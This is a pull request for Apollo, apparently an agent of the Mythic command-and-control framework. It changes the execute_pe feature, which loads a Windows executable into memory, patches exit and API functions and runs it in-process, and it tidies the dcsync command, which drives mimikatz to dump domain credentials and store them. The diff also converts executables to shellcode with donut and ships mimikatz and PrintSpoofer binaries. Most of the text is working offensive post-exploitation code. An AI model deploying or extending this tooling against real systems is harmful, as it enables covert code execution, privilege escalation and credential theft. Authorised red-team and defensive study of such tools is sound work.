### PR TITLE
Fixes for Mimikatz and changes to Execute PE implementation

### DIFF
--- a/Payload_Type/apollo/Dockerfile
+++ b/Payload_Type/apollo/Dockerfile
@@ -7,6 +7,7 @@ WORKDIR /Mythic/
 RUN python3 -m venv /venv
 RUN /venv/bin/python -m pip install mythic-container==0.4.10
 RUN /venv/bin/python -m pip install donut-shellcode
+RUN /venv/bin/python -m pip install mslex
 
 COPY [".", "."]
 

--- a/Payload_Type/apollo/apollo/agent_code/Apollo.sln
+++ b/Payload_Type/apollo/apollo/agent_code/Apollo.sln
@@ -45,7 +45,8 @@ Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "WebsocketProfile", "Websock
 EndProject
 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "KerberosTickets", "KerberosTickets\KerberosTickets.csproj", "{2EA76D5F-44EB-4B41-8752-0A9380E5A28A}"
 EndProject
-
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ExecutePE.Standalone", "ExecutePE.Standalone\ExecutePE.Standalone.csproj", "{8F530743-F632-41FC-BBEA-B6727542A719}"
+EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Debug|Any CPU = Debug|Any CPU
@@ -308,6 +309,18 @@ Global
 		{2EA76D5F-44EB-4B41-8752-0A9380E5A28A}.Release|x64.Build.0 = Release|Any CPU
 		{2EA76D5F-44EB-4B41-8752-0A9380E5A28A}.Release|x86.ActiveCfg = Release|Any CPU
 		{2EA76D5F-44EB-4B41-8752-0A9380E5A28A}.Release|x86.Build.0 = Release|Any CPU
+		{8F530743-F632-41FC-BBEA-B6727542A719}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{8F530743-F632-41FC-BBEA-B6727542A719}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{8F530743-F632-41FC-BBEA-B6727542A719}.Debug|x64.ActiveCfg = Debug|x64
+		{8F530743-F632-41FC-BBEA-B6727542A719}.Debug|x64.Build.0 = Debug|x64
+		{8F530743-F632-41FC-BBEA-B6727542A719}.Debug|x86.ActiveCfg = Debug|x86
+		{8F530743-F632-41FC-BBEA-B6727542A719}.Debug|x86.Build.0 = Debug|x86
+		{8F530743-F632-41FC-BBEA-B6727542A719}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{8F530743-F632-41FC-BBEA-B6727542A719}.Release|Any CPU.Build.0 = Release|Any CPU
+		{8F530743-F632-41FC-BBEA-B6727542A719}.Release|x64.ActiveCfg = Release|x64
+		{8F530743-F632-41FC-BBEA-B6727542A719}.Release|x64.Build.0 = Release|x64
+		{8F530743-F632-41FC-BBEA-B6727542A719}.Release|x86.ActiveCfg = Release|x86
+		{8F530743-F632-41FC-BBEA-B6727542A719}.Release|x86.Build.0 = Release|x86
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE

--- a/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Classes/Core/Tasking.cs
+++ b/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Classes/Core/Tasking.cs
@@ -45,7 +45,7 @@ namespace ApolloInterop.Classes
             _cancellationToken.Cancel();
         }
 
-        public virtual MythicTaskResponse CreateTaskResponse(object userOutput, bool completed, string status = "completed", IEnumerable<IMythicMessage> messages = null)
+        public virtual MythicTaskResponse CreateTaskResponse(object userOutput, bool completed, string? status = null, IEnumerable<IMythicMessage>? messages = null)
         {
             MythicTaskResponse resp = new MythicTaskResponse();
             resp.UserOutput = userOutput;

--- a/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Enums/ApolloEnums.cs
+++ b/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Enums/ApolloEnums.cs
@@ -79,6 +79,7 @@
             DownloadMessage,
             FileBrowserACE,
             IPCCommandArguments,
+            ExecutePEIPCMessage,
             ProcessInformation,
             CommandInformation,
             ScreenshotInformation,

--- a/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Structs/ApolloStructs.cs
+++ b/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Structs/ApolloStructs.cs
@@ -144,6 +144,24 @@ namespace ApolloInterop.Structs.ApolloStructs
         }
     }
 
+    [DataContract]
+    public struct ExecutePEIPCMessage : IMythicMessage
+    {
+        [DataMember(Name = "executable")]
+        public byte[] Executable;
+
+        [DataMember(Name = "name")]
+        public string ImageName;
+
+        [DataMember(Name = "commandline")]
+        public string CommandLine;
+
+        public readonly MessageType GetTypeCode()
+        {
+            return MessageType.ExecutePEIPCMessage;
+        }
+    }
+
 
     [DataContract]
     public struct ProcessResponse

--- a/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Structs/MythicStructs.cs
+++ b/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Structs/MythicStructs.cs
@@ -764,7 +764,7 @@ namespace ApolloInterop.Structs
             [DataMember(Name = "task_id")]
             public string TaskID;
             [DataMember(Name = "status")]
-            public string Status;
+            public string? Status;
             [DataMember(Name = "keylogs")]
             public KeylogInformation[] Keylogs;
             [DataMember(Name = "edges")]

--- a/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Types/MythicTypes.cs
+++ b/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Types/MythicTypes.cs
@@ -86,7 +86,11 @@ namespace ApolloInterop.Types
             } else if (msg == MessageType.IPCCommandArguments)
             {
                 return typeof(IPCCommandArguments);
-            } else if (msg == MessageType.ScreenshotInformation)
+            } else if (msg == MessageType.ExecutePEIPCMessage)
+            {
+                return typeof(ExecutePEIPCMessage);
+            }
+            else if (msg == MessageType.ScreenshotInformation)
             {
                 return typeof(ScreenshotInformation);
             } else if (msg == MessageType.KeylogInformation)

--- a/Payload_Type/apollo/apollo/agent_code/ExecutePE.Standalone/ExecutePE.Standalone.csproj
+++ b/Payload_Type/apollo/apollo/agent_code/ExecutePE.Standalone/ExecutePE.Standalone.csproj
@@ -1,0 +1,16 @@
+﻿<Project Sdk="Microsoft.NET.Sdk">
+  <PropertyGroup>
+    <TargetFramework>net451</TargetFramework>
+    <OutputType>Exe</OutputType>
+    <LangVersion>12</LangVersion>
+    <Nullable>enable</Nullable>
+    <GenerateAssemblyInfo>false</GenerateAssemblyInfo>
+    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
+    <Platforms>AnyCPU;x64;x86</Platforms>
+  </PropertyGroup>
+
+  <ItemGroup>
+    <ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" />
+    <ProjectReference Include="..\ExecutePE\ExecutePE.csproj" />
+  </ItemGroup>
+</Project>

--- a/Payload_Type/apollo/apollo/agent_code/ExecutePE.Standalone/Program.cs
+++ b/Payload_Type/apollo/apollo/agent_code/ExecutePE.Standalone/Program.cs
@@ -1,0 +1,38 @@
+﻿using System;
+using System.IO;
+using ApolloInterop.Structs.ApolloStructs;
+
+namespace ExecutePE.Standalone;
+
+internal static class Program
+{
+    private static int Main(string[] args)
+    {
+        if (args.Length < 1)
+        {
+            Console.WriteLine($"Executable not specified");
+            return -1;
+        }
+
+        var executablePath = args[0];
+        Console.WriteLine($"Executable: {executablePath}");
+
+        var executable = File.ReadAllBytes(executablePath);
+
+        var executableName = Path.GetFileName(executablePath);
+        Console.WriteLine($"Executable name: {executableName}");;
+
+        var peCommandLine = Environment.CommandLine.Substring(Environment.CommandLine.IndexOf(executableName));
+        Console.WriteLine($"PE Command line: {peCommandLine}");
+
+        var message = new ExecutePEIPCMessage()
+        {
+            Executable = executable,
+            ImageName = executableName,
+            CommandLine = peCommandLine,
+        };
+
+        PERunner.RunPE(message);
+        return 0;
+    }
+}

--- a/Payload_Type/apollo/apollo/agent_code/ExecutePE/Helpers/Utils.cs
+++ b/Payload_Type/apollo/apollo/agent_code/ExecutePE/Helpers/Utils.cs
@@ -8,84 +8,23 @@ namespace ExecutePE.Helpers
     {
         internal static byte[] PatchFunction(string dllName, string funcName, byte[] patchBytes)
         {
-#if DEBUG
-
-
-            var patchString = "";
-            foreach (var x in patchBytes)
-            {
-                patchString += "0x" + x.ToString("X") + " ";
-            }
-
-
-
-
-
-#endif
             var moduleHandle = NativeDeclarations.GetModuleHandle(dllName);
             var pFunc = NativeDeclarations.GetProcAddress(moduleHandle, funcName);
-#if DEBUG
-
-
-#endif
             var originalBytes = new byte[patchBytes.Length];
             Marshal.Copy(pFunc, originalBytes, 0, patchBytes.Length);
 
-#if DEBUG
-            var originalBytesString = "";
-            foreach (var x in originalBytes)
-            {
-                originalBytesString += "0x" + x.ToString("X") + " ";
-            }
-
-
-
-#endif
             var result = NativeDeclarations.VirtualProtect(pFunc, (UIntPtr)patchBytes.Length,
                 NativeDeclarations.PAGE_EXECUTE_READWRITE, out var oldProtect);
             if (!result)
             {
-#if DEBUG
-
-
-                var error = NativeDeclarations.GetLastError();
-
-
-#endif
                 return null;
             }
-#if DEBUG
-            else
-            {
-
-
-            }
-#endif
             Marshal.Copy(patchBytes, 0, pFunc, patchBytes.Length);
-
-#if DEBUG
-
-
-#endif
 
             result = NativeDeclarations.VirtualProtect(pFunc, (UIntPtr)patchBytes.Length, oldProtect, out _);
             if (!result)
             {
-#if DEBUG
-
-
-                var error = NativeDeclarations.GetLastError();
-
-
-#endif
             }
-#if DEBUG
-            else
-            {
-
-
-            }
-#endif
             return originalBytes;
         }
 
@@ -95,11 +34,6 @@ namespace ExecutePE.Helpers
                 NativeDeclarations.PAGE_EXECUTE_READWRITE, out var oldProtect);
             if (!result)
             {
-#if DEBUG
-
-
-
-#endif
                 return false;
             }
 
@@ -107,16 +41,8 @@ namespace ExecutePE.Helpers
             result = NativeDeclarations.VirtualProtect(pAddress, (UIntPtr)IntPtr.Size, oldProtect, out _);
             if (!result)
             {
-#if DEBUG
-
-
-#endif
                 return false;
             }
-#if DEBUG
-
-
-#endif
             return true;
         }
 
@@ -126,14 +52,6 @@ namespace ExecutePE.Helpers
                 out var oldProtect);
             if (!result)
             {
-#if DEBUG
-
-
-                var error = NativeDeclarations.GetLastError();
-
-
-                return false;
-#endif
             }
 
             var zeroes = new byte[length];
@@ -147,13 +65,6 @@ namespace ExecutePE.Helpers
             result = NativeDeclarations.VirtualProtect(start, (UIntPtr)length, oldProtect, out _);
             if (!result)
             {
-#if DEBUG
-
-
-                var error = NativeDeclarations.GetLastError();
-
-
-#endif
                 return false;
             }
 
@@ -186,11 +97,7 @@ namespace ExecutePE.Helpers
             }
             else
             {
-
-
                 var error = NativeDeclarations.GetLastError();
-
-
             }
 
             Marshal.FreeHGlobal(processBasicInformation);

--- a/Payload_Type/apollo/apollo/agent_code/ExecutePE/Patchers/ExtraAPIPatcher.cs
+++ b/Payload_Type/apollo/apollo/agent_code/ExecutePE/Patchers/ExtraAPIPatcher.cs
@@ -16,7 +16,7 @@ namespace ExecutePE.Patchers
 
         public bool PatchAPIs(IntPtr baseAddress)
         {
-            _getModuleHandleFuncName = Encoding.UTF8.Equals(Program.encoding) ? "GetModuleHandleW" : "GetModuleHandleA";
+            _getModuleHandleFuncName = Encoding.UTF8.Equals(PERunner.encoding) ? "GetModuleHandleW" : "GetModuleHandleA";
 
 #if DEBUG
 

--- a/Payload_Type/apollo/apollo/agent_code/ExecutePE/RunPE.cs
+++ b/Payload_Type/apollo/apollo/agent_code/ExecutePE/RunPE.cs
@@ -1,0 +1,73 @@
+using System;
+using System.Runtime.InteropServices;
+using System.Text;
+using ApolloInterop.Structs.ApolloStructs;
+using ExecutePE.Internals;
+using ExecutePE.Patchers;
+
+namespace ExecutePE;
+
+public static class PERunner
+{
+    [DllImport("shell32.dll", SetLastError = true)]
+    static extern IntPtr CommandLineToArgvW(
+        [MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine,
+        out int pNumArgs);
+
+    [DllImport("kernel32.dll")]
+    static extern IntPtr LocalFree(IntPtr hMem);
+
+    internal static Encoding encoding = Encoding.UTF8;
+
+    public static void RunPE(ExecutePEIPCMessage message)
+    {
+
+        var peMapper = new PEMapper();
+        peMapper.MapPEIntoMemory(message.Executable, out var pe, out var currentBase);
+
+        var importResolver = new ImportResolver();
+        importResolver.ResolveImports(pe, currentBase);
+
+        peMapper.SetPagePermissions();
+
+        var argumentHandler = new ArgumentHandler();
+        if (!argumentHandler.UpdateArgs(message.ImageName, message.CommandLine))
+        {
+            throw new InvalidOperationException("Failed to update arguments");
+        }
+
+        var exitPatcher = new ExitPatcher();
+        if (!exitPatcher.PatchExit())
+        {
+            throw new InvalidOperationException("Failed to patch exit function");
+        }
+
+        var extraEnvironmentalPatcher = new ExtraEnvironmentPatcher((IntPtr)currentBase);
+        extraEnvironmentalPatcher.PerformExtraEnvironmentPatches();
+
+        // Patch this last as may interfere with other activity
+        var extraAPIPatcher = new ExtraAPIPatcher();
+
+        if (!extraAPIPatcher.PatchAPIs((IntPtr)currentBase))
+        {
+            throw new InvalidOperationException("Failed to patch APIs");
+        }
+
+        StartExecution(pe, currentBase);
+
+        // Revert changes
+        exitPatcher.ResetExitFunctions();
+        extraAPIPatcher.RevertAPIs();
+        extraEnvironmentalPatcher.RevertExtraPatches();
+        argumentHandler.ResetArgs();
+        peMapper.ClearPE();
+        importResolver.ResetImports();
+    }
+
+    private static void StartExecution(PELoader pe, long currentBase)
+    {
+        var threadStart = (IntPtr)(currentBase + (int)pe.OptionalHeader64.AddressOfEntryPoint);
+        var hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
+        NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
+    }
+}

--- a/Payload_Type/apollo/apollo/mythic/agent_functions/dcsync.py
+++ b/Payload_Type/apollo/apollo/mythic/agent_functions/dcsync.py
@@ -1,8 +1,4 @@
-from operator import truediv
 from mythic_container.MythicCommandBase import *
-import json
-from uuid import uuid4
-from apollo.mythic.sRDI import ShellcodeRDI
 from os import path
 from mythic_container.MythicRPC import *
 import base64
@@ -16,40 +12,32 @@ class DcSyncArguments(TaskArguments):
             CommandParameter(
                 name="domain",
                 cli_name="Domain",
-                display_name="Domain", 
-                type=ParameterType.String, 
+                display_name="Domain",
+                type=ParameterType.String,
                 description="Domain to sync credentials from.",
-                parameter_group_info=[
-                    ParameterGroupInfo(
-                        ui_position=1,
-                        required=True
-                    )
-                ]),
+                parameter_group_info=[ParameterGroupInfo(ui_position=1, required=True)],
+            ),
             CommandParameter(
                 name="user",
                 cli_name="User",
-                display_name="User", 
+                display_name="User",
                 default_value="all",
-                type=ParameterType.String, 
+                type=ParameterType.String,
                 description="Username to sync. Defaults to all.",
                 parameter_group_info=[
-                    ParameterGroupInfo(
-                        ui_position=2,
-                        required=False
-                    )
-                ]),
+                    ParameterGroupInfo(ui_position=2, required=False)
+                ],
+            ),
             CommandParameter(
                 name="dc",
                 cli_name="DC",
-                display_name="DC", 
-                type=ParameterType.String, 
+                display_name="DC",
+                type=ParameterType.String,
                 description="Domain controller to sync credential material from.",
                 parameter_group_info=[
-                    ParameterGroupInfo(
-                        ui_position=3,
-                        required=False
-                    )
-                ]),
+                    ParameterGroupInfo(ui_position=3, required=False)
+                ],
+            ),
         ]
 
     async def parse_arguments(self):
@@ -72,12 +60,22 @@ class DcSyncArguments(TaskArguments):
 
             self.add_arg("command", "mimikatz.exe {}".format(cmd))
         else:
-            raise Exception("No mimikatz command given to execute.\n\tUsage: {}".format(DcSyncCommand.help_cmd))
+            raise Exception(
+                "No mimikatz command given to execute.\n\tUsage: {}".format(
+                    DcSyncCommand.help_cmd
+                )
+            )
 
 
-async def parse_credentials_dcsync(task: PTTaskCompletionFunctionMessage) -> PTTaskCompletionFunctionMessageResponse:
-    response = PTTaskCompletionFunctionMessageResponse(Success=True, TaskStatus="success", Completed=True)
-    responses = await SendMythicRPCResponseSearch(MythicRPCResponseSearchMessage(TaskID=task.SubtaskData.Task.ID))
+async def parse_credentials_dcsync(
+    task: PTTaskCompletionFunctionMessage,
+) -> PTTaskCompletionFunctionMessageResponse:
+    response = PTTaskCompletionFunctionMessageResponse(
+        Success=True, TaskStatus="success", Completed=True
+    )
+    responses = await SendMythicRPCResponseSearch(
+        MythicRPCResponseSearchMessage(TaskID=task.SubtaskData.Task.ID)
+    )
     for output in responses.Responses:
         mimikatz_out = str(output.Response)
         comment = "task {}".format(output.TaskID)
@@ -88,11 +86,11 @@ async def parse_credentials_dcsync(task: PTTaskCompletionFunctionMessage) -> PTT
                 line = lines[i]
                 if "Username" in line:
                     # Check to see if Password is null
-                    if i+2 >= len(lines):
+                    if i + 2 >= len(lines):
                         break
                     uname = line.split(" : ")[1].strip()
-                    realm = lines[i+1].split(" : ")[1].strip()
-                    passwd = lines[i+2].split(" : ")[1].strip()
+                    realm = lines[i + 1].split(" : ")[1].strip()
+                    passwd = lines[i + 2].split(" : ")[1].strip()
                     if passwd != "(null)":
                         cred_resp = await MythicRPC().execute(
                             "create_credential",
@@ -101,7 +99,7 @@ async def parse_credentials_dcsync(task: PTTaskCompletionFunctionMessage) -> PTT
                             account=uname,
                             realm=realm,
                             credential=passwd,
-                            comment=comment
+                            comment=comment,
                         )
                         if cred_resp.status != MythicStatus.Success:
                             raise Exception("Failed to register credential")
@@ -110,9 +108,7 @@ async def parse_credentials_dcsync(task: PTTaskCompletionFunctionMessage) -> PTT
 
 class DcSyncCommand(CommandBase):
     cmd = "dcsync"
-    attributes=CommandAttributes(
-        dependencies=["execute_pe"]
-    )
+    attributes = CommandAttributes(dependencies=["execute_pe"])
     needs_admin = False
     help_cmd = "dcsync -Domain [domain] -User [user]"
     description = "Sync a user's Kerberos keys to the local machine."
@@ -123,7 +119,9 @@ class DcSyncCommand(CommandBase):
     script_only = True
     completion_functions = {"parse_credentials_dcsync": parse_credentials_dcsync}
 
-    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:
+    async def create_go_tasking(
+        self, taskData: PTTaskMessageAllData
+    ) -> PTTaskCreateTaskingMessageResponse:
         response = PTTaskCreateTaskingMessageResponse(
             TaskID=taskData.Task.ID,
             Success=True,
@@ -138,6 +136,8 @@ class DcSyncCommand(CommandBase):
             response.Stderr = f"Failed to run subtask: {sub.Error}"
         return response
 
-    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
+    async def process_response(
+        self, task: PTTaskMessageAllData, response: any
+    ) -> PTTaskProcessResponseMessageResponse:
         resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
         return resp

--- a/Payload_Type/apollo/apollo/mythic/agent_functions/execute_pe.py
+++ b/Payload_Type/apollo/apollo/mythic/agent_functions/execute_pe.py
@@ -2,12 +2,9 @@ from distutils.dir_util import copy_tree
 import shutil
 import tempfile
 from mythic_container.MythicCommandBase import *
-import json
 from uuid import uuid4
-from apollo.mythic.sRDI import ShellcodeRDI
 from mythic_container.MythicRPC import *
 from os import path
-import base64
 import os
 import asyncio
 import platform
@@ -15,7 +12,7 @@ import platform
 PRINTSPOOFER_FILE_ID = ""
 MIMIKATZ_FILE_ID = ""
 
-if platform.system() == 'Windows':  
+if platform.system() == "Windows":
     EXECUTE_PE_PATH = "C:\\Mythic\\Apollo\\srv\\ExecutePE.exe"
 else:
     EXECUTE_PE_PATH = "/srv/ExecutePE.exe"
@@ -55,16 +52,21 @@ class ExecutePEArguments(TaskArguments):
                         group_name="Default",
                         ui_position=2
                     ),
-                ]),
+                ],
+            ),
         ]
 
-    async def get_files(self, inputMsg: PTRPCDynamicQueryFunctionMessage) -> PTRPCDynamicQueryFunctionMessageResponse:
+    async def get_files(
+        self, inputMsg: PTRPCDynamicQueryFunctionMessage
+    ) -> PTRPCDynamicQueryFunctionMessageResponse:
         fileResponse = PTRPCDynamicQueryFunctionMessageResponse(Success=False)
-        file_resp = await SendMythicRPCFileSearch(MythicRPCFileSearchMessage(
-            CallbackID=inputMsg.Callback,
-            LimitByCallback=True,
-            Filename="",
-        ))
+        file_resp = await SendMythicRPCFileSearch(
+            MythicRPCFileSearchMessage(
+                CallbackID=inputMsg.Callback,
+                LimitByCallback=True,
+                Filename="",
+            )
+        )
         if file_resp.Success:
             file_names = []
             for f in file_resp.Files:
@@ -79,7 +81,11 @@ class ExecutePEArguments(TaskArguments):
 
     async def parse_arguments(self):
         if len(self.command_line) == 0:
-            raise Exception("Require a PE to execute.\n\tUsage: {}".format(ExecutePECommand.help_cmd))
+            raise Exception(
+                "Require a PE to execute.\n\tUsage: {}".format(
+                    ExecutePECommand.help_cmd
+                )
+            )
         if self.command_line[0] == "{":
             self.load_args_from_json_string(self.command_line)
         else:
@@ -104,18 +110,33 @@ class ExecutePECommand(CommandBase):
         try:
             global EXECUTE_PE_PATH
             agent_build_path = tempfile.TemporaryDirectory()
-            outputPath = "{}/ExecutePE/bin/Release/ExecutePE.exe".format(agent_build_path.name)
+            outputPath = "{}/ExecutePE/bin/Release/ExecutePE.exe".format(
+                agent_build_path.name
+            )
             copy_tree(str(self.agent_code_path), agent_build_path.name)
-            shell_cmd = "dotnet build -c release -p:Platform=x64 {}/ExecutePE/ExecutePE.csproj -o {}/ExecutePE/bin/Release".format(agent_build_path.name, agent_build_path.name)
-            proc = await asyncio.create_subprocess_shell(shell_cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, cwd=agent_build_path.name)
+            shell_cmd = "dotnet build -c release -p:Platform=x64 {}/ExecutePE/ExecutePE.csproj -o {}/ExecutePE/bin/Release".format(
+                agent_build_path.name, agent_build_path.name
+            )
+            proc = await asyncio.create_subprocess_shell(
+                shell_cmd,
+                stdout=asyncio.subprocess.PIPE,
+                stderr=asyncio.subprocess.PIPE,
+                cwd=agent_build_path.name,
+            )
             stdout, stderr = await proc.communicate()
             if not path.exists(outputPath):
-                raise Exception("Failed to build ExecutePE.exe:\n{}".format(stderr.decode() + "\n" + stdout.decode()))
+                raise Exception(
+                    "Failed to build ExecutePE.exe:\n{}".format(
+                        stderr.decode() + "\n" + stdout.decode()
+                    )
+                )
             shutil.copy(outputPath, EXECUTE_PE_PATH)
         except Exception as ex:
             raise Exception(ex)
 
-    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:
+    async def create_go_tasking(
+        self, taskData: PTTaskMessageAllData
+    ) -> PTTaskCreateTaskingMessageResponse:
         response = PTTaskCreateTaskingMessageResponse(
             TaskID=taskData.Task.ID,
             Success=True,
@@ -127,55 +148,72 @@ class ExecutePECommand(CommandBase):
 
         taskData.args.add_arg("pipe_name", str(uuid4()))
         mimikatz_path = os.path.abspath(self.agent_code_path / "mimikatz_x64.exe")
-        printspoofer_path = os.path.abspath(self.agent_code_path / "PrintSpoofer_x64.exe")
-        if platform.system() == 'Windows': 
-            shellcode_path =  "C:\\Mythic\\Apollo\\temp\\loader.bin"
+        printspoofer_path = os.path.abspath(
+            self.agent_code_path / "PrintSpoofer_x64.exe"
+        )
+        if platform.system() == "Windows":
+            shellcode_path = "C:\\Mythic\\Apollo\\temp\\loader.bin"
         else:
             shellcode_path = "/tmp/loader.bin"
-        
-        if platform.system() == 'Windows':
+
+        if platform.system() == "Windows":
             donutPath = os.path.abspath(self.agent_code_path / "donut.exe")
         else:
             donutPath = os.path.abspath(self.agent_code_path / "donut")
-        
+
         command = "chmod 777 {}; chmod +x {}".format(donutPath, donutPath)
-        proc = await asyncio.create_subprocess_shell(command, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)
+        proc = await asyncio.create_subprocess_shell(
+            command, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
+        )
         stdout, stderr = await proc.communicate()
 
         if not path.exists(EXECUTE_PE_PATH):
             await self.build_exepe()
 
-        if platform.system() == 'Windows':
-            command = "{} -i {} -p \"{}\"".format(donutPath, EXECUTE_PE_PATH, taskData.args.get_arg("pipe_name"))
+        if platform.system() == "Windows":
+            command = '{} -i {} -p "{}"'.format(
+                donutPath, EXECUTE_PE_PATH, taskData.args.get_arg("pipe_name")
+            )
         else:
-            command = "{} -f 1 {} -p \"{}\"".format(donutPath, EXECUTE_PE_PATH, taskData.args.get_arg("pipe_name"))
-        #print(command)
+            command = '{} -f 1 {} -p "{}"'.format(
+                donutPath, EXECUTE_PE_PATH, taskData.args.get_arg("pipe_name")
+            )
+        # print(command)
         # need to go through one more step to turn our exe into shellcode
-        if platform.system() == 'Windows': 
-            Currentwd =  "C:\\Mythic\\Apollo\\temp\\"
+        if platform.system() == "Windows":
+            Currentwd = "C:\\Mythic\\Apollo\\temp\\"
         else:
             Currentwd = "/tmp"
-        proc = await asyncio.create_subprocess_shell(command, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, cwd=Currentwd)
+        proc = await asyncio.create_subprocess_shell(
+            command,
+            stdout=asyncio.subprocess.PIPE,
+            stderr=asyncio.subprocess.PIPE,
+            cwd=Currentwd,
+        )
         stdout, stderr = await proc.communicate()
 
-        stdout_err = f'[stdout]\n{stdout.decode()}\n'
-        stdout_err = f'[stderr]\n{stderr.decode()}'
+        stdout_err = f"[stdout]\n{stdout.decode()}\n"
+        stdout_err = f"[stderr]\n{stderr.decode()}"
 
         if not path.exists(shellcode_path):
             raise Exception("Failed to create shellcode:\n{}".format(stdout_err))
         else:
             with open(shellcode_path, "rb") as f:
                 shellcode = f.read()
-            file_resp = await SendMythicRPCFileCreate(MythicRPCFileCreateMessage(
-                TaskID=taskData.Task.ID,
-                Filename="execute_pe shellcode",
-                DeleteAfterFetch=False,
-                FileContents=shellcode
-            ))
+            file_resp = await SendMythicRPCFileCreate(
+                MythicRPCFileCreateMessage(
+                    TaskID=taskData.Task.ID,
+                    Filename="execute_pe shellcode",
+                    DeleteAfterFetch=False,
+                    FileContents=shellcode,
+                )
+            )
             if file_resp.Success:
                 taskData.args.add_arg("loader_stub_id", file_resp.AgentFileId)
             else:
-                raise Exception("Failed to register ExecutePE shellcode: " + file_resp.Error)
+                raise Exception(
+                    "Failed to register ExecutePE shellcode: " + file_resp.Error
+                )
 
         # I know I could abstract these routines out but I'm rushing
         if taskData.args.get_arg("pe_name") == "mimikatz.exe":
@@ -184,12 +222,14 @@ class ExecutePECommand(CommandBase):
             else:
                 with open(mimikatz_path, "rb") as f:
                     mimibytes = f.read()
-                file_resp = await SendMythicRPCFileCreate(MythicRPCFileCreateMessage(
-                    TaskID=taskData.Task.ID,
-                    Filename="execute_pe mimikatz",
-                    DeleteAfterFetch=False,
-                    FileContents=mimibytes
-                ))
+                file_resp = await SendMythicRPCFileCreate(
+                    MythicRPCFileCreateMessage(
+                        TaskID=taskData.Task.ID,
+                        Filename="execute_pe mimikatz",
+                        DeleteAfterFetch=False,
+                        FileContents=mimibytes,
+                    )
+                )
                 if file_resp.Success:
                     taskData.args.add_arg(PE_VARNAME, file_resp.AgentFileId)
                     MIMIKATZ_FILE_ID = file_resp.AgentFileId
@@ -201,12 +241,14 @@ class ExecutePECommand(CommandBase):
             else:
                 with open(printspoofer_path, "rb") as f:
                     psbytes = f.read()
-                file_resp = await SendMythicRPCFileCreate(MythicRPCFileCreateMessage(
-                    TaskID=taskData.Task.ID,
-                    Filename="execute_pe printspoofer",
-                    DeleteAfterFetch=False,
-                    FileContents=psbytes
-                ))
+                file_resp = await SendMythicRPCFileCreate(
+                    MythicRPCFileCreateMessage(
+                        TaskID=taskData.Task.ID,
+                        Filename="execute_pe printspoofer",
+                        DeleteAfterFetch=False,
+                        FileContents=psbytes,
+                    )
+                )
                 if file_resp.Success:
                     taskData.args.add_arg(PE_VARNAME, file_resp.AgentFileId)
                     PRINTSPOOFER_FILE_ID = file_resp.AgentFileId
@@ -219,6 +261,8 @@ class ExecutePECommand(CommandBase):
         )
         return response
 
-    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
+    async def process_response(
+        self, task: PTTaskMessageAllData, response: any
+    ) -> PTTaskProcessResponseMessageResponse:
         resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
         return resp


### PR DESCRIPTION
This PR includes fixes to the Mimikatz set of commands (`mimikatz`, `pth`, `dcsync`). The fixes for these commands required changing the `execute_pe` command.

Details for each change are outlined here:
- [Add typed IPC message for execute_pe](https://github.com/MEhrn00/Apollo/commit/bf2e14616f9afdc573fe73936f4bb79216e3a6fa) - This adds a new message type for the execute pe IPC messages. Apollo currently sends the task data to the sacrificial process through a generic [`IPCCommandArguments`](https://github.com/MythicAgents/Apollo/tree/d98af57a90b84dff25cdbe3dce8b040c955f6792/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Structs/ApolloStructs.cs#L134) with a string data and binary data field. These fields will contain the executable binary in the binary data field and all of the task parameters combined in the string data field. This causes issues when Apollo receives the IPC data since it has to split up the string data to get the necessary parameters. The new message type eliminates the need for this parsing.
- [Modify Mythic response status field](https://github.com/MEhrn00/Apollo/commit/20ede32ad0e372e86c3ff9f8e0651f7d7f02ed52) - The status field for task responses requires a value. If that value is not specified, a default value of "completed" is added [Tasking.cs#L48](https://github.com/MythicAgents/Apollo/blob/master/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Classes/Core/Tasking.cs#L48). A task may want to update the user output but not modify the status. This makes the status field optional so that a Mythic response does not overwrite the status if it is not desired.
- [Change execute_pe.py argument handling](https://github.com/MEhrn00/Apollo/commit/a2eea6ce7f737c20a11a3bf911e456dbba10f29f) - This changes the command line argument processing from execute pe to be done fully in the Mythic server instead of in the agent. [mslex](https://mslex.readthedocs.io/en/latest/readme.html) is used to quote command line strings instead of manually escaping special characters.
